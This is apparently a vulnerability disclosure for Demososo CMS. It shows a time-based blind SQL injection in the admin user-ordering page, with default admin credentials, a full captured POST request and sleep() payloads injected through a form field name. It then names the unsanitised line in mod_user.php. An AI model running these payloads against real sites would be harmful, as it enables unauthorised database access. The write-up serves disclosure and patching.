'Demososo-code-audit'

Demososo CMS SQL injection.

SQL injection

After install this CMS, enter admin page through /dmqyjz_v20190822/admindm-yourname/g.php

log in with admin:admin123

click upper right corner button which is circled by red box

or visit /dmqyjz_v20190822/admindm-yourname/mod_account/mod_user.php?lang=cn

click the button which is circled by red box

Use Burp Suite and set Intercept on to catch this package

POST /dmqyjz_v20190822/admindm-yourname/mod_account/mod_user.php?lang=cn&file=list&act=pos HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/dmqyjz_v20190822/admindm-yourname/mod_account/mod_user.php?lang=cn
Cookie: UM_distinctid=16cfc4a88ff268-067ca10ef68b488-1262694a-1fa400-16cfc4a890029a; CNZZDATA1256279252=1005958402-1567599470-http%253A%252F%252Flocalhost%252F%7C1567599470; usercookie=77-5ed9412c29c00eda8c8eca41483d82f6; isadmin=y; admindir=admindm-yourname; username=admin; PHPSESSID=1sean1pmkvo9o10v44mub0a8b3
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

99=50&Submit=%E6%8E%92%E5%BA%8F

and send this package to repeater to compare payloads

Modify package to see difference

Payloads:

99'%09or%09sleep(1)#=50&Submit=%E6%8E%92%E5%BA%8F

99'%09or%09sleep(5)#=50&Submit=%E6%8E%92%E5%BA%8F

99'%09or%09sleep(10)#=50&Submit=%E6%8E%92%E5%BA%8F

there is obvious difference in response time

so this is SQL injection

what causes SQL injection

in /dmqyjz_v20190822/admindm-yourname/mod_account/mod_user.php Line 42

$v was sent to MySQL directly